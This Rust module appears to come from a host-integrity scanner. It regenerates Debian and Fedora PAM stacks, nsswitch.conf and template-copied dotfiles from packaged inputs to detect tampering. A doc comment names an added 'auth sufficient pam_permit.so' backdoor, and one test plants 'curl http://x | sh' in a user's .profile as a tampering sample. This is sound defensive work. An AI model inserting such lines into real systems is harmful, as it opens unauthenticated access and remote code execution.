//! Files no package's manifest vouches for whose exact content is what a
//! named generator makes from packaged files. On every Debian-family host
//! they would otherwise read as Unpackaged: /etc/nsswitch.conf, which
//! libc-bin copies from its template, and the /etc/pam.d/common-* stacks
//! pam-auth-update assembles from per-package profiles. On Fedora, rpm owns
//! the PAM stacks authselect renders, but as %ghost files with no digest, so
//! they would read as integrity unknown.
//!
//! The file is regenerated here the way its generator does it, from the
//! generator's inputs, and compared byte for byte. It is Reproduced only when
//! every input is itself packaged and intact. Any other byte, an added
//! `auth sufficient pam_permit.so` included, leaves it Unpackaged.
//!
//! The two generators are implemented from their documentation and from what
//! the real tools were seen to do, not from their source: pam-auth-update
//! (libpam-runtime 1.5.2) and authselect 1.7.1 were run on generated inputs,
//! and what they wrote is recorded in tests/vectors, which the tests below
//! require this module to reproduce byte for byte. tests/vectors/README.md
//! says how to regenerate them.

use std::collections::{BTreeMap, BTreeSet};
use std::path::{Path, PathBuf};

use crate::entry::{Integrity, Provenance};
use crate::root::Root;

use super::Answers;

const CAP: usize = 256 * 1024;

const NSSWITCH: &str = "etc/nsswitch.conf";
const NSSWITCH_TEMPLATE: &str = "usr/share/libc-bin/nsswitch.conf";

/// Files a package's postinst installs by copying a template it ships, so
/// that dpkg owns the template and never the file: base-files' /etc/profile
/// and root's dotfiles, openssh-server's sshd_config from Debian 12 on,
/// sysvinit-core's inittab. Byte for byte the template, the file is what the
/// package wrote; edited, it is the operator's or an intruder's, and shows.
const COPIES: [(&str, &str); 5] = [
    ("etc/profile", "usr/share/base-files/profile"),
    ("root/.bashrc", "usr/share/base-files/dot.bashrc"),
    ("root/.profile", "usr/share/base-files/dot.profile"),
    ("etc/ssh/sshd_config", "usr/share/openssh/sshd_config"),
    ("etc/inittab", "usr/share/sysvinit/inittab"),
];

/// adduser copies /etc/skel into every new home; bash ships the skeleton as
/// conffiles, so an untouched copy in a home is bash's own text.
const SKEL: [&str; 3] = [".bashrc", ".profile", ".bash_logout"];

/// The packaged template a path is a copy of, if it is one of the known
/// copies: a home's dotfile is /etc/skel's, root's is base-files'.
fn template_of(path: &Path) -> Option<PathBuf> {
    if let Some((_, template)) = COPIES.iter().find(|(p, _)| Path::new(p) == path) {
        return Some(PathBuf::from(template));
    }
    let name = path.file_name()?.to_str()?;
    if SKEL.contains(&name) && path.components().count() >= 3 {
        return Some(Path::new("etc/skel").join(name));
    }
    None
}

const PAM_TYPES: [&str; 5] = ["auth", "account", "password", "session", "session-noninteractive"];
const PAM_TEMPLATES: &str = "usr/share/pam";
const PAM_PROFILES: &str = "usr/share/pam-configs";
const PAM_SAVED: &str = "var/lib/pam";

const AUTHSELECT_CONF: &str = "etc/authselect/authselect.conf";
const AUTHSELECT_PAM: [&str; 6] =
    ["system-auth", "password-auth", "fingerprint-auth", "smartcard-auth", "switchable-auth", "postlogin"];
const AUTHSELECT_PREAMBLE: &str = "# Generated by authselect\n\
# Do not modify this file manually, use authselect instead. Any user changes will be overwritten.\n\
# You can stop authselect from managing your configuration by calling 'authselect opt-out'.\n\
# See authselect(8) for more details.\n\n";

fn read(root: &Root, rel: &Path) -> Option<Vec<u8>> {
    root.read_capped(rel, CAP).ok().filter(|(_, truncated)| !truncated).map(|(b, _)| b)
}

/// For each wanted path this module can reproduce, the packaged files the
/// reproduction reads, whose verdicts must be looked up alongside it.
pub fn inputs(root: &Root, wanted: &std::collections::BTreeSet<PathBuf>) -> Vec<PathBuf> {
    let mut out = Vec::new();
    for path in wanted {
        if path == Path::new(NSSWITCH) {
            out.push(PathBuf::from(NSSWITCH_TEMPLATE));
        } else if let Some(ty) = pam_type(path) {
            out.push(Path::new(PAM_TEMPLATES).join(format!("common-{ty}")));
            out.extend(saved_modules(root, ty).into_iter().map(|m| Path::new(PAM_PROFILES).join(m)));
        } else if let Some(name) = authselect_name(path) {
            if let Some((dir, _)) = authselect_config(root) {
                out.push(dir.join(name));
            }
        } else if let Some(template) = template_of(path) {
            out.push(template);
        }
    }
    out
}

/// Verdicts for the wanted paths no package claimed and this module can
/// reproduce from packaged, intact inputs.
pub fn classify(root: &Root, wanted: &std::collections::BTreeSet<PathBuf>, answers: &Answers) -> Answers {
    let intact = |p: &Path| {
        matches!(answers.get(p), Some(Provenance::Packaged { integrity: Integrity::Intact, .. }))
    };
    let mut out = Answers::new();
    for path in wanted {
        // A verdict a package database gave stands, unless it is a file the
        // database owns without a digest (rpm's %ghost), which says nothing
        // about its content.
        match answers.get(path) {
            None | Some(Provenance::Packaged { integrity: Integrity::Unknown, .. }) => {}
            Some(_) => continue,
        }
        let (expected, inputs, by) = if path == Path::new(NSSWITCH) {
            let Some(Provenance::Packaged { package, .. }) = answers.get(Path::new(NSSWITCH_TEMPLATE)) else { continue };
            let by = format!("{package}, identical to /{NSSWITCH_TEMPLATE}");
            (read(root, Path::new(NSSWITCH_TEMPLATE)), vec![PathBuf::from(NSSWITCH_TEMPLATE)], by)
        } else if let Some(ty) = pam_type(path) {
            let template = Path::new(PAM_TEMPLATES).join(format!("common-{ty}"));
            let modules = saved_modules(root, ty);
            let mut inputs: Vec<PathBuf> = modules.iter().map(|m| Path::new(PAM_PROFILES).join(m)).collect();
            inputs.push(template.clone());
            (pam_auth_update(root, ty, &template, &modules), inputs, "pam-auth-update".to_string())
        } else if let Some(name) = authselect_name(path) {
            let Some((dir, features)) = authselect_config(root) else { continue };
            let template = dir.join(name);
            // A profile without this file renders it empty, preamble only.
            let (rendered, inputs) = match read(root, &template) {
                Some(t) => (authselect_render(&t, &features), vec![template]),
                None if !root.exists(&template) => (Some(Vec::new()), Vec::new()),
                None => continue,
            };
            let expected = rendered.map(|r| [AUTHSELECT_PREAMBLE.as_bytes(), &r].concat());
            (expected, inputs, "authselect".to_string())
        } else if let Some(template) = template_of(path) {
            let Some(Provenance::Packaged { package, .. }) = answers.get(&template) else { continue };
            let by = format!("{package}, identical to /{}", template.display());
            (read(root, &template), vec![template], by)
        } else {
            continue;
        };
        if !inputs.iter().all(|p| intact(p)) {
            continue;
        }
        if let (Some(expected), Some(actual)) = (expected, read(root, path)) {
            if expected == actual {
                out.insert(path.clone(), Provenance::Reproduced { by });
            }
        }
    }
    out
}

fn pam_type(path: &Path) -> Option<&'static str> {
    let name = path.strip_prefix("etc/pam.d").ok()?.to_str()?.strip_prefix("common-")?;
    PAM_TYPES.iter().copied().find(|t| *t == name)
}

/// What pam-auth-update saves in place of an empty Primary block, and writes
/// into the stack there; it names no profile.
const PAM_EMPTY_PRIMARY: &str = "[default=1]\t\t\tpam_permit.so";

/// The comment lines pam-auth-update finds its blocks by, in order: after the
/// first comes the Primary block, the second ends it, after the third comes
/// the Additional block, the fourth ends it. A line counts when it starts
/// with the text.
const PAM_MARKERS: [&str; 4] = [
    "# here are the per-package modules (the \"Primary\" block)",
    "# here's the fallback if no module succeeds",
    "# and here are more per-package modules (the \"Additional\" block)",
    "# end of pam-auth-update config",
];

/// Perl's `\s` on bytes, which is what pam-auth-update splits on.
fn pam_space(b: u8) -> bool {
    matches!(b, b' ' | b'\t' | b'\n' | b'\r' | 0x0b | 0x0c)
}

fn pam_trim(mut s: &[u8]) -> &[u8] {
    while let [first, rest @ ..] = s {
        if !pam_space(*first) {
            break;
        }
        s = rest;
    }
    while let [rest @ .., last] = s {
        if !pam_space(*last) {
            break;
        }
        s = rest;
    }
    s
}

/// The profiles pam-auth-update last used for one stack, in its order, read
/// from the state it saves in /var/lib/pam/`ty`.
fn saved_modules(root: &Root, ty: &str) -> Vec<String> {
    let Some(bytes) = read(root, &Path::new(PAM_SAVED).join(ty)) else { return Vec::new() };
    // Each profile is `Module: <name>` followed by the lines it gave.
    let mut entries: Vec<(&[u8], Vec<&[u8]>)> = Vec::new();
    for line in bytes.split(|b| *b == b'\n') {
        match line.strip_prefix(b"Module: ") {
            Some(name) => entries.push((name, Vec::new())),
            None => {
                if let Some((_, lines)) = entries.last_mut() {
                    lines.push(line);
                }
            }
        }
    }
    let mut out = Vec::new();
    for (i, (name, lines)) in entries.iter().enumerate() {
        // The empty-Primary stand-in is saved first, as `null`. A profile
        // really called null gives its own lines instead.
        let lines: Vec<&[u8]> = lines.iter().copied().filter(|l| !l.is_empty()).collect();
        if i == 0 && *name == b"null" && lines == [PAM_EMPTY_PRIMARY.as_bytes()] {
            continue;
        }
        // Profiles are files in one directory: anything else is not a name
        // the tool saved.
        let Ok(name) = std::str::from_utf8(name) else { continue };
        if name.is_empty() || name == "." || name == ".." || name.contains('/') {
            continue;
        }
        out.push(name.to_string());
    }
    out
}

/// A profile's fields as pam-auth-update reads them: `Name: value` starts a
/// field when the name has no whitespace and the colon ends the first word;
/// every other line belongs to the field above it, trimmed, and blank ones
/// are dropped. A field given twice keeps the later one. The value on the
/// name's own line keeps any trailing whitespace, so `Auth-Type: Primary `
/// is not Primary.
fn pam_profile(text: &[u8]) -> BTreeMap<&[u8], Vec<&[u8]>> {
    let mut fields: BTreeMap<&[u8], Vec<&[u8]>> = BTreeMap::new();
    let mut current: Option<&[u8]> = None;
    for line in text.split(|b| *b == b'\n') {
        let word = &line[..line.iter().position(|b| pam_space(*b)).unwrap_or(line.len())];
        if let Some(name) = word.strip_suffix(b":").filter(|n| !n.is_empty()) {
            let rest = &line[word.len()..];
            let value = &rest[rest.iter().position(|b| !pam_space(*b)).unwrap_or(rest.len())..];
            fields.insert(name, if value.is_empty() { Vec::new() } else { vec![value] });
            current = Some(name);
        } else if let Some(name) = current {
            let line = pam_trim(line);
            if !line.is_empty() {
                fields.entry(name).or_default().push(line);
            }
        }
    }
    fields
}

/// Where the four markers are, as line indices, in order; `None` when the
/// template lacks one, and pam-auth-update refuses it.
fn pam_markers(lines: &[&[u8]]) -> Option<[usize; 4]> {
    let mut at = [0; 4];
    let mut from = 0;
    for (i, marker) in PAM_MARKERS.iter().enumerate() {
        at[i] = from + lines[from..].iter().position(|l| l.starts_with(marker.as_bytes()))?;
        from = at[i] + 1;
    }
    Some(at)
}

/// One profile line as pam-auth-update writes it into a stack: the type, a
/// tab, the control (a bracketed list or one word) with every `end` in it
/// replaced by `jump`, the whitespace that followed it, the module, a space
/// and the arguments re-joined with single spaces. A line that is not
/// control, whitespace, module is written as the type, a tab and a space.
fn pam_stack_line(out: &mut Vec<u8>, word: &str, line: &[u8], jump: usize) {
    let control = match line.first() {
        Some(b'[') => line.iter().position(|b| *b == b']').map_or(0, |i| i + 1),
        _ => line.iter().position(|b| !(b.is_ascii_alphanumeric() || *b == b'_')).unwrap_or(line.len()),
    };
    let sep = line[control..].iter().position(|b| !pam_space(*b)).map_or(line.len(), |i| control + i);
    let module = line[sep..].iter().position(|b| pam_space(*b)).map_or(line.len(), |i| sep + i);
    out.extend_from_slice(word.as_bytes());
    out.push(b'\t');
    if control > 0 && sep > control && module > sep {
        let jump = jump.to_string();
        let mut rest = &line[..control];
        while let Some(i) = rest.windows(3).position(|w| w == b"end") {
            out.extend_from_slice(&rest[..i]);
            out.extend_from_slice(jump.as_bytes());
            rest = &rest[i + 3..];
        }
        out.extend_from_slice(rest);
        out.extend_from_slice(&line[control..module]);
        out.push(b' ');
        let args: Vec<&[u8]> = line[module..].split(|b| pam_space(*b)).filter(|a| !a.is_empty()).collect();
        out.extend_from_slice(&args.join(&b' '));
    } else {
        out.push(b' ');
    }
    out.push(b'\n');
}

/// /etc/pam.d/common-`ty` as pam-auth-update writes it from `template` and
/// the profiles `modules` names, in that order. `None` where it would not
/// write the file.
fn pam_auth_update(root: &Root, ty: &str, template: &Path, modules: &[String]) -> Option<Vec<u8>> {
    if !PAM_TYPES.contains(&ty) {
        return None;
    }
    // The tool writes the stacks in PAM_TYPES order and stops at the first
    // template without its markers, so an earlier one keeps this one from
    // being written too.
    for earlier in PAM_TYPES.iter().take_while(|t| **t != ty) {
        let text = read(root, &Path::new(PAM_TEMPLATES).join(format!("common-{earlier}")))?;
        pam_markers(&text.split_inclusive(|b| *b == b'\n').collect::<Vec<_>>())?;
    }
    let text = read(root, template)?;
    let lines: Vec<&[u8]> = text.split_inclusive(|b| *b == b'\n').collect();
    let [primary_at, fallback_at, additional_at, end_at] = pam_markers(&lines)?;

    // session-noninteractive is built from the Session fields.
    let word = ty.split('-').next().unwrap_or(ty);
    let field = format!("{}{}", word[..1].to_ascii_uppercase(), &word[1..]);
    let (main, initial, kind) = (field.as_bytes(), format!("{field}-Initial"), format!("{field}-Type"));

    // The tool lists a profile whose -Type is neither Primary nor Additional
    // twice. It gives no lines, so a repeat is skipped, not read again.
    let mut seen = BTreeSet::new();
    let mut texts = Vec::new();
    for name in modules {
        if seen.insert(name.as_str()) {
            texts.push(read(root, &Path::new(PAM_PROFILES).join(name))?);
        }
    }
    // Primary, then Additional: the lines, and whether a profile of that
    // type has come yet. The first of each type gives its -Initial lines,
    // when it has any.
    let mut blocks: [(Vec<&[u8]>, bool); 2] = Default::default();
    for text in &texts {
        let fields = pam_profile(text);
        if ty == "session-noninteractive" && fields.contains_key(&b"Session-Interactive-Only"[..]) {
            continue;
        }
        let block = match fields.get(kind.as_bytes()).map(Vec::as_slice) {
            Some([b"Primary"]) => &mut blocks[0],
            Some([b"Additional"]) => &mut blocks[1],
            _ => continue,
        };
        let first_initial = fields.get(initial.as_bytes()).filter(|l| !block.1 && !l.is_empty());
        block.1 = true;
        block.0.extend(first_initial.or(fields.get(main)).into_iter().flatten());
    }

    let mut out = Vec::new();
    lines[..=primary_at].iter().for_each(|l| out.extend_from_slice(l));
    let primary = &blocks[0].0;
    if primary.is_empty() {
        out.extend_from_slice(format!("{word}\t{PAM_EMPTY_PRIMARY}\n").as_bytes());
    }
    // `end` becomes the number of block lines after it, and one more in
    // Primary, whatever the template has after the block.
    for (i, line) in primary.iter().enumerate() {
        pam_stack_line(&mut out, word, line, primary.len() - i);
        // What cannot fit in a file this module reads is never a match.
        if out.len() > CAP {
            return None;
        }
    }
    lines[fallback_at..=additional_at].iter().for_each(|l| out.extend_from_slice(l));
    let additional = &blocks[1].0;
    for (i, line) in additional.iter().enumerate() {
        pam_stack_line(&mut out, word, line, additional.len() - i - 1);
        // What cannot fit in a file this module reads is never a match.
        if out.len() > CAP {
            return None;
        }
    }
    lines[end_at..].iter().for_each(|l| out.extend_from_slice(l));
    Some(out)
}

fn authselect_name(path: &Path) -> Option<&'static str> {
    let name = path.strip_prefix("etc/pam.d").ok()?.to_str()?;
    AUTHSELECT_PAM.iter().copied().find(|n| *n == name)
}

/// The profile directory and features authselect.conf names: its first
/// non-empty line is the profile id, the rest are features. A vendor profile
/// of that id is used before a default one, as authselect does; a custom one
/// lives in /etc and is nobody's package.
fn authselect_config(root: &Root) -> Option<(PathBuf, Vec<String>)> {
    let bytes = read(root, Path::new(AUTHSELECT_CONF))?;
    let text = String::from_utf8(bytes).ok()?;
    let mut lines = text.lines().map(str::trim).filter(|l| !l.is_empty());
    let id = lines.next()?;
    if id.contains("..") {
        return None;
    }
    let dir = match id.strip_prefix("custom/") {
        Some(custom) => Path::new("etc/authselect/custom").join(custom),
        None => ["usr/share/authselect/vendor", "usr/share/authselect/default"]
            .iter()
            .map(|d| Path::new(d).join(id))
            .find(|d| root.exists(d))?,
    };
    Some((dir, lines.map(String::from).collect()))
}

/// Parentheses nested deeper than this are not rendered: authselect was seen
/// to render them 50 000 deep and to crash, writing nothing, 80 000 deep.
const AUTHSELECT_DEPTH: usize = 50_000;

/// A conditional operator in an authselect template, as it is found between
/// braces.
enum Op<'a> {
    Continue(&'a [u8]),
    Stop(&'a [u8]),
    Include(&'a [u8]),
    Exclude(&'a [u8]),
    Imply(&'a [u8], &'a [u8]),
    If(&'a [u8], &'a [u8], Option<&'a [u8]>),
}

/// Why an expression was not evaluated.
enum Fail {
    /// Malformed: authselect writes the file empty.
    Syntax,
    /// Parentheses nested deeper than AUTHSELECT_DEPTH.
    Depth,
}

/// The operator whose `{` is at `line[at]`, and where it ends. authselect
/// takes the keywords only in lower case, one space apart, and an operator
/// only when its pieces avoid braces and, per piece: no `:` or `|` in an
/// expression, no `|` in an `if` value, no `|` or `"` in an implied name.
/// Anything else is left as text.
fn authselect_op(line: &[u8], at: usize) -> Option<(usize, Op<'_>)> {
    let span = |from: usize, stop: &[u8]| -> usize {
        line[from..].iter().position(|b| b"{}".contains(b) || stop.contains(b)).map_or(line.len(), |i| from + i)
    };
    // An expression running to `}` from `from`: (its end, past the brace).
    let expr = |from: usize| -> Option<(&[u8], usize)> {
        let end = span(from, b":|");
        (end > from && line.get(end) == Some(&b'}')).then(|| (&line[from..end], end + 1))
    };
    let body = &line[at + 1..];
    let found = |kw: &[u8]| body.starts_with(kw).then_some(at + 1 + kw.len());
    if let Some(from) = found(b"continue if ") {
        expr(from).map(|(e, end)| (end, Op::Continue(e)))
    } else if let Some(from) = found(b"stop if ") {
        expr(from).map(|(e, end)| (end, Op::Stop(e)))
    } else if let Some(from) = found(b"include if ") {
        expr(from).map(|(e, end)| (end, Op::Include(e)))
    } else if let Some(from) = found(b"exclude if ") {
        expr(from).map(|(e, end)| (end, Op::Exclude(e)))
    } else if let Some(from) = found(b"imply \"") {
        let name_end = span(from, b"|\"");
        let cond = name_end + b"\" if ".len();
        if name_end == from || line.get(name_end..cond) != Some(b"\" if ") {
            return None;
        }
        expr(cond).map(|(e, end)| (end, Op::Imply(&line[from..name_end], e)))
    } else if let Some(from) = found(b"if ") {
        let colon = span(from, b":|");
        if colon == from || line.get(colon) != Some(&b':') {
            return None;
        }
        let yes_end = span(colon + 1, b"|");
        let yes = &line[colon + 1..yes_end];
        match line.get(yes_end) {
            Some(b'}') => Some((yes_end + 1, Op::If(&line[from..colon], yes, None))),
            Some(b'|') => {
                let no_end = span(yes_end + 1, b"|");
                (line.get(no_end) == Some(&b'}'))
                    .then(|| (no_end + 1, Op::If(&line[from..colon], yes, Some(&line[yes_end + 1..no_end]))))
            }
            _ => None,
        }
    } else {
        None
    }
}

enum Token<'a> {
    Open,
    Close,
    Name(&'a [u8]),
    And,
    Or,
    Not,
    End,
}

/// The next token of an expression and the text after it. Tokens need no
/// whitespace between them; the keywords are taken in any case. The first
/// byte that starts no token (anything but space, tab, a parenthesis, a
/// quote or a letter) ends the expression, and the rest is ignored.
fn authselect_token(text: &[u8]) -> Result<(Token<'_>, &[u8]), Fail> {
    let text = &text[text.iter().position(|b| !matches!(b, b' ' | b'\t')).unwrap_or(text.len())..];
    let (token, len) = match text.first() {
        Some(b'(') => (Token::Open, 1),
        Some(b')') => (Token::Close, 1),
        Some(b'"') => {
            let close = text[1..].iter().position(|b| *b == b'"').ok_or(Fail::Syntax)?;
            (Token::Name(&text[1..1 + close]), close + 2)
        }
        Some(b) if b.is_ascii_alphabetic() => {
            let len = text.iter().position(|b| !b.is_ascii_alphabetic()).unwrap_or(text.len());
            let token = match text[..len].to_ascii_lowercase().as_slice() {
                b"and" => Token::And,
                b"or" => Token::Or,
                b"not" => Token::Not,
                _ => return Err(Fail::Syntax),
            };
            (token, len)
        }
        _ => (Token::End, text.len()),
    };
    Ok((token, &text[len..]))
}

/// An authselect expression, evaluated as authselect evaluates it: `and`
/// and `or` have equal precedence and group from the left, and `not` takes
/// the one operand after it.
fn authselect_eval(mut text: &[u8], features: &BTreeSet<&[u8]>) -> Result<bool, Fail> {
    // One entry per open parenthesis, and one for the whole: the value so
    // far, the operator waiting for the next operand, and whether that
    // operand is negated. Kept on the heap, so depth costs no stack.
    struct Group {
        value: Option<bool>,
        and: Option<bool>,
        negate: bool,
    }
    let mut groups = vec![Group { value: None, and: None, negate: false }];
    loop {
        let (token, rest) = authselect_token(text)?;
        text = rest;
        let nested = groups.len() > 1;
        let Some(group) = groups.last_mut() else { return Err(Fail::Syntax) };
        let wants_operand = group.value.is_none() || group.and.is_some();
        let operand = match token {
            Token::Not if wants_operand => {
                group.negate = !group.negate;
                continue;
            }
            Token::Open if wants_operand => {
                if groups.len() > AUTHSELECT_DEPTH {
                    return Err(Fail::Depth);
                }
                groups.push(Group { value: None, and: None, negate: false });
                continue;
            }
            Token::And | Token::Or if !wants_operand => {
                group.and = Some(matches!(token, Token::And));
                continue;
            }
            Token::Name(name) if wants_operand => features.contains(name),
            Token::Close if !wants_operand && nested => {
                let inner = group.value.unwrap_or_default();
                groups.pop();
                inner
            }
            Token::End if !wants_operand && !nested => return Ok(group.value.unwrap_or_default()),
            _ => return Err(Fail::Syntax),
        };
        let Some(group) = groups.last_mut() else { return Err(Fail::Syntax) };
        let operand = operand != group.negate;
        group.value = Some(match (group.value, group.and) {
            (Some(value), Some(true)) => value && operand,
            (Some(value), Some(false)) => value || operand,
            _ => operand,
        });
        (group.and, group.negate) = (None, false);
    }
}

/// A profile's template rendered as authselect renders it with `features`
/// selected, without the preamble authselect puts above it. `None` where
/// authselect would not write the file.
///
/// Operators are applied line by line, left to right, each seeing the
/// features implied above it. One that removes its line (`include`/`exclude`
/// deciding against it, `continue if` true, `stop if` false, `imply`) takes
/// the whole line and its newline, and later operators on that line are
/// never looked at; so is anything after a stop. An expression that does not
/// parse empties the whole file, but only once it is reached.
fn authselect_render(template: &[u8], features: &[String]) -> Option<Vec<u8>> {
    let mut features: BTreeSet<&[u8]> = features.iter().map(|f| f.as_bytes()).collect();
    let mut out = Vec::new();
    let mut lines = template.split(|b| *b == b'\n').peekable();
    'lines: while let Some(line) = lines.next() {
        let start = out.len();
        let (mut copied, mut from) = (0, 0);
        while let Some(brace) = line[from..].iter().position(|b| *b == b'{').map(|i| from + i) {
            let Some((end, op)) = authselect_op(line, brace) else {
                from = brace + 1;
                continue;
            };
            out.extend_from_slice(&line[copied..brace]);
            let (Op::Continue(e) | Op::Stop(e) | Op::Include(e) | Op::Exclude(e) | Op::Imply(_, e) | Op::If(e, ..)) =
                op;
            let holds = match authselect_eval(e, &features) {
                Ok(holds) => holds,
                Err(Fail::Syntax) => return Some(Vec::new()),
                Err(Fail::Depth) => return None,
            };
            let keep_line = match op {
                Op::Continue(_) | Op::Stop(_) if holds == matches!(op, Op::Stop(_)) => {
                    return Some(authselect_trim(&out));
                }
                Op::Include(_) | Op::Exclude(_) => holds == matches!(op, Op::Include(_)),
                Op::If(_, yes, no) => {
                    out.extend_from_slice(if holds { yes } else { no.unwrap_or_default() });
                    true
                }
                Op::Imply(name, _) => {
                    if holds {
                        features.insert(name);
                    }
                    false
                }
                Op::Continue(_) | Op::Stop(_) => false,
            };
            if !keep_line {
                out.truncate(start);
                continue 'lines;
            }
            (copied, from) = (end, end);
        }
        out.extend_from_slice(&line[copied..]);
        if lines.peek().is_some() {
            out.push(b'\n');
        }
    }
    Some(authselect_trim(&out))
}

/// authselect writes every line without its trailing whitespace, except
/// that a line of nothing but whitespace keeps its first byte.
fn authselect_trim(text: &[u8]) -> Vec<u8> {
    let space = |b: &u8| matches!(b, b' ' | b'\t' | b'\r' | 0x0b | 0x0c);
    let lines: Vec<&[u8]> = text
        .split(|b| *b == b'\n')
        .map(|line| match line.iter().rposition(|b| !space(b)) {
            Some(last) => &line[..=last],
            None => &line[..line.len().min(1)],
        })
        .collect();
    lines.join(&b'\n')
}

#[cfg(test)]
mod tests {
    use super::*;

    /// A test vector: the files a case's generator read and wrote, recorded
    /// from the real tool. Each is `=== <path> <length>`, exactly that many
    /// bytes, then a newline.
    fn case(bytes: &[u8]) -> BTreeMap<String, Vec<u8>> {
        let mut out = BTreeMap::new();
        let mut rest = bytes;
        while !rest.is_empty() {
            let nl = rest.iter().position(|b| *b == b'\n').expect("header line");
            let header = std::str::from_utf8(&rest[..nl]).unwrap();
            let (path, len) = header.strip_prefix("=== ").unwrap().rsplit_once(' ').unwrap();
            let len: usize = len.parse().unwrap();
            let body = &rest[nl + 1..nl + 1 + len];
            assert_eq!(rest[nl + 1 + len], b'\n');
            out.insert(path.to_string(), body.to_vec());
            rest = &rest[nl + 2 + len..];
        }
        out
    }

    /// Every case of one generator, each laid out as a scan root.
    fn vectors(kind: &str) -> Vec<(String, PathBuf, BTreeMap<String, Vec<u8>>)> {
        let dir = Path::new(env!("CARGO_MANIFEST_DIR")).join("tests/vectors").join(kind);
        let mut names: Vec<_> = std::fs::read_dir(&dir).unwrap().map(|e| e.unwrap().path()).collect();
        names.sort();
        assert!(names.len() > 100, "the {kind} vectors are missing");
        names
            .into_iter()
            .map(|p| {
                let files = case(&std::fs::read(&p).unwrap());
                let root = std::env::temp_dir().join(format!(
                    "unbidden-vector-{kind}-{}-{}",
                    p.file_stem().unwrap().to_string_lossy(),
                    std::process::id()
                ));
                let _ = std::fs::remove_dir_all(&root);
                for (rel, body) in &files {
                    let f = root.join(rel);
                    std::fs::create_dir_all(f.parent().unwrap()).unwrap();
                    std::fs::write(f, body).unwrap();
                }
                (p.file_name().unwrap().to_string_lossy().into_owned(), root, files)
            })
            .collect()
    }

    #[test]
    fn a_file_identical_to_the_packaged_template_it_was_copied_from_is_reproduced() {
        let dir = std::env::temp_dir().join(format!("unbidden-copies-{}", std::process::id()));
        let _ = std::fs::remove_dir_all(&dir);
        for d in ["etc/skel", "usr/share/base-files", "root", "home/alice", "var/lib/dpkg/info"] {
            std::fs::create_dir_all(dir.join(d)).unwrap();
        }
        let md5 = |b: &[u8]| {
            use md5::Digest as _;
            crate::entry::hex(&md5::Md5::digest(b))
        };
        let profile = b"# /etc/profile: system-wide .profile file\nif [ \"$(id -u)\" -eq 0 ]; then PATH=/usr/sbin:/usr/bin; fi\n";
        let bashrc = b"# ~/.bashrc\ncase $- in *i*) ;; *) return;; esac\n";
        let skel_profile = b"# ~/.profile\n";
        std::fs::write(dir.join("usr/share/base-files/profile"), profile).unwrap();
        std::fs::write(dir.join("usr/share/base-files/dot.bashrc"), bashrc).unwrap();
        std::fs::write(dir.join("etc/skel/.bashrc"), bashrc).unwrap();
        std::fs::write(dir.join("etc/skel/.profile"), skel_profile).unwrap();
        std::fs::write(dir.join("etc/profile"), profile).unwrap();
        std::fs::write(dir.join("root/.bashrc"), bashrc).unwrap();
        std::fs::write(dir.join("home/alice/.bashrc"), bashrc).unwrap();
        std::fs::write(dir.join("home/alice/.profile"), b"curl http://x | sh\n").unwrap();
        let status = format!(
            "Package: base-files\nStatus: install ok installed\nVersion: 13\n\nPackage: bash\nStatus: install ok installed\nVersion: 5.2\nConffiles:\n /etc/skel/.bashrc {}\n /etc/skel/.profile {}\n\n",
            md5(bashrc),
            md5(skel_profile)
        );
        std::fs::write(dir.join("var/lib/dpkg/status"), status).unwrap();
        std::fs::write(dir.join("var/lib/dpkg/info/base-files.list"), "/usr/share/base-files/profile\n/usr/share/base-files/dot.bashrc\n").unwrap();
        std::fs::write(
            dir.join("var/lib/dpkg/info/base-files.md5sums"),
            format!("{}  usr/share/base-files/profile\n{}  usr/share/base-files/dot.bashrc\n", md5(profile), md5(bashrc)),
        )
        .unwrap();
        std::fs::write(dir.join("var/lib/dpkg/info/bash.list"), "/etc/skel/.bashrc\n/etc/skel/.profile\n").unwrap();

        let root = Root::at(&dir).unwrap();
        let wanted: std::collections::BTreeSet<PathBuf> =
            ["etc/profile", "root/.bashrc", "home/alice/.bashrc", "home/alice/.profile"].iter().map(PathBuf::from).collect();
        let answers = super::super::resolve(&root, &wanted).answers;
        let by = |p: &str| match &answers[Path::new(p)] {
            Provenance::Reproduced { by } => by.clone(),
            other => format!("{other:?}"),
        };
        assert_eq!(by("etc/profile"), "base-files, identical to /usr/share/base-files/profile");
        assert_eq!(by("root/.bashrc"), "base-files, identical to /usr/share/base-files/dot.bashrc");
        assert_eq!(by("home/alice/.bashrc"), "bash, identical to /etc/skel/.bashrc");
        assert_eq!(answers[Path::new("home/alice/.profile")], Provenance::Unpackaged, "an edited copy is the operator's or an intruder's");

        // The template itself edited: nothing it matches is vouched for.
        std::fs::write(dir.join("usr/share/base-files/profile"), "# tampered\n").unwrap();
        std::fs::write(dir.join("etc/profile"), "# tampered\n").unwrap();
        let answers = super::super::resolve(&root, &wanted).answers;
        assert_eq!(answers[Path::new("etc/profile")], Provenance::Unpackaged);
        std::fs::remove_dir_all(&dir).unwrap();
    }

    #[test]
    fn every_stack_pam_auth_update_wrote_is_reproduced() {
        let mut checked = 0;
        for (name, dir, files) in vectors("pam-auth-update") {
            let root = Root::at(&dir).unwrap();
            for ty in PAM_TYPES {
                let Some(want) = files.get(&format!("etc/pam.d/common-{ty}")) else { continue };
                let template = Path::new(PAM_TEMPLATES).join(format!("common-{ty}"));
                let got = pam_auth_update(&root, ty, &template, &saved_modules(&root, ty));
                assert_eq!(
                    got.as_deref().map(String::from_utf8_lossy),
                    Some(String::from_utf8_lossy(want)),
                    "{name} common-{ty}"
                );
                checked += 1;
            }
            std::fs::remove_dir_all(&dir).unwrap();
        }
        assert!(checked > 500);
    }

    #[test]
    fn every_file_authselect_wrote_is_reproduced() {
        let mut checked = 0;
        for (name, dir, files) in vectors("authselect") {
            let root = Root::at(&dir).unwrap();
            let (profile, features) = authselect_config(&root).expect("authselect.conf names a profile");
            for file in AUTHSELECT_PAM.iter().chain(["nsswitch.conf"].iter()) {
                let Some(want) = files.get(&format!("etc/authselect/{file}")) else { continue };
                let rendered = match files.get(&format!("{}/{file}", profile.display())) {
                    Some(t) => authselect_render(t, &features),
                    None => Some(Vec::new()),
                };
                let got = rendered.map(|r| [AUTHSELECT_PREAMBLE.as_bytes(), &r].concat());
                assert_eq!(
                    got.as_deref().map(String::from_utf8_lossy),
                    Some(String::from_utf8_lossy(want)),
                    "{name} {file} with {features:?}"
                );
                checked += 1;
            }
            std::fs::remove_dir_all(&dir).unwrap();
        }
        assert!(checked > 500);
    }
}
